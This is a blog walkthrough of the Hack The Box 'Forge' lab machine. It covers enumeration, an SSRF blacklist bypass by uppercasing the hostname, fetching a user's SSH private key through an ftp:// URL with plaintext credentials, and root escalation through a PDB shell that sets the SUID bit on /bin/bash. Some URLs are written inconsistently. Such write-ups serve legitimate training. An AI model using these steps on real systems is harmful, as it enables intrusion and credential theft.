Forge hack the box walkthrough

Tamilcode 1

 FORGE HACK THE BOX WALKTHROUGH





WELCOME TO TAMILCODE

   HERE IS TRICKS AND TECHNOLOGY









NAME Forge
DIFFICULTY Medium
POINTS 30
IP 10.10.11.111



So in this website, we going to see the walkthrough or writeup for the forge hack the box machine and we going to take over the root flag and user flag from the machine. So let get started. and video is also available in the middle and last section ( please check it)


First I'm going to load this IP in the browser which is 10.10.11.111  and it was redirected to the forge.htb 




So add this hostname to the /etc/hosts file to access this page.



Now you can able to access the page





ENUMERATION:


Next, we going to take the nmap scan



STEP 1: nmap -sC -sV 10.10.11.111


The report has been given below



Further analyzing this nmap report I have found the interesting ports and services which SSH 22, FTP 21, etc...


Next, we going to emulate the directory using gobuster 


STEP 2: gobuster  dir -u http://forge.htb -w  /usr/share/dirb/wordlists/common.txt


The report has given below





Further analyzing this gobuster report nothing should be the interest



Next, we going to emulate subdomain (DNS)


STEP 3: gobuster vhost forge.htb -u http://forge.htb -w /usr/share/seclists/Discovery/DNS/subdomain-top1million-110000.txt -r


The report has been given below




Further analyzing I have found the subdomain which admin.forge.htb



So add this domain in the /etc/hosts file to access this page


After seeing this subdomain I have found that it was allowing the localhost but it was backlist by the domain (if don't understand just follow this you get the idea)



Let us see that.



So first enter into the upload directory ( shown in the below image)




Now you can able see the upload local file and upload from  URL 


I have tried  for the reverse shell but it was not working so we going to try this by upload from URL


Now we going to give the Subdomain in this place which is http://admin.forge.htb 


Before that open the burpsuit to capture the request 




After capture, this request in burpsuit send it to the repeater 




Next, send the request to get the response



By seeing this response you can able to identify that the URL has been blacklist ( shown in the below image)






So let us bypass this (by the changing lower case letter to the upper case letter)





Let us change that URL http://ADMIN.FORGE.HTB


Edit the URL and send to get the response ( shown in the below image)



Now it is working you can see that the file has been upload ( shown above image)




Now we load this URL in the browser but it is not working so let us curl this URL



STEP 4: curl http://forge.htb/uploads/yrqwrstyghjdklo



Now you can able to see another directory which /announcements




So next we try this directory in burpsuit  ( Shown in the below image)



Now we going to curl this


STEP 5: curl http:///forge.htb/uploads/ymkldklsdkkdfjfrewee4rrtf



booooooooooooom!!!!!!!!!!!


Now you can able to see the FTP user name and password 





So next we going to try this for login



So first go to the burpsuit and change the URL


http://ADMIN.HTB.FORGE/upload?u=ftp://user:heightofsecurity123!@127.1.1.1/.ssh/id_rsa



Now you can able to get the id_rsa key so next, we going to log in through SSH




So save the id_rsa key in the file and give the permission chmod 600 id_rsa


STEP 6: ssh -i id_rsa user@10.10.11.111






boooooooooooooooooooooooooooooooooooooom!!!!!!!!!!!!!





Now you can able to see the user flag which is user.txt




STEP 7: ls


STEP 8: cat user.txt




If you don't understand anything please watch the video for user flag





PRIVILEGE ESCALATION 


So next we going to take over the root flag which is root.txt



STEP 9: sudo -l


To list the user privilege 


Now you can able to see the remote-manage.py file




So let us check the python code

 

STEP 10: cat /opt/remote-manage.py



Further analyzing this code I have founded two inserting this which is  the password  secretadminpassword 


And another interesting thing is PDB 



PDB - python debugger


It is a module for interactive source code for the debugger in the python program 



So now we going to escalate the privilege using this PDB



So first we run this program using the below command


STEP 11: sudo /usr/bin/python3 /opt/remote-manage.py



So now it was listening in the localhost 49894




warning: Please note that the port will be changed randomly.


Next, open another terminal and enter into the ssh 

STEP 12: ssh -i id_rsa user@10.10.11.111


Now start the netcat in localhost


STEP 13: nc localhost 49894

Now it will ask the password which is secretadminpassword 




And enter something which like ( shown in the below image) hackedbytamilcodevicky







Now you get the PDB shell 




And enter the below code


import os

os.system ('chmod u+s /bin/bash')


Now exit from the PDB shell








STEP 14: /bin/bash -p




STEP 15: cd root


STEP 16: cat root.txt


booooooooooooooooooooooooooooooooooooooooooooooooooommmmmmm!!!!



Now you can able to get the root shell which is the root.txt






If you don't understand this article please watch the video for the root flag



I hope you will understand this article. if you like this article please donate to us








If you want any support please join in tamilcode membership 













Tags

Tamilcode

I'm Vignesh from Chennai I would like to like explore something new in this cyber security field

1 Comments

  1. Unknown20 November 2021 at 16:02

    Hey! I want to make a deal with you man. If you were ineterested contact me via telegram @Codetamil

    ReplyDelete

Post a Comment

Previous Post Next Post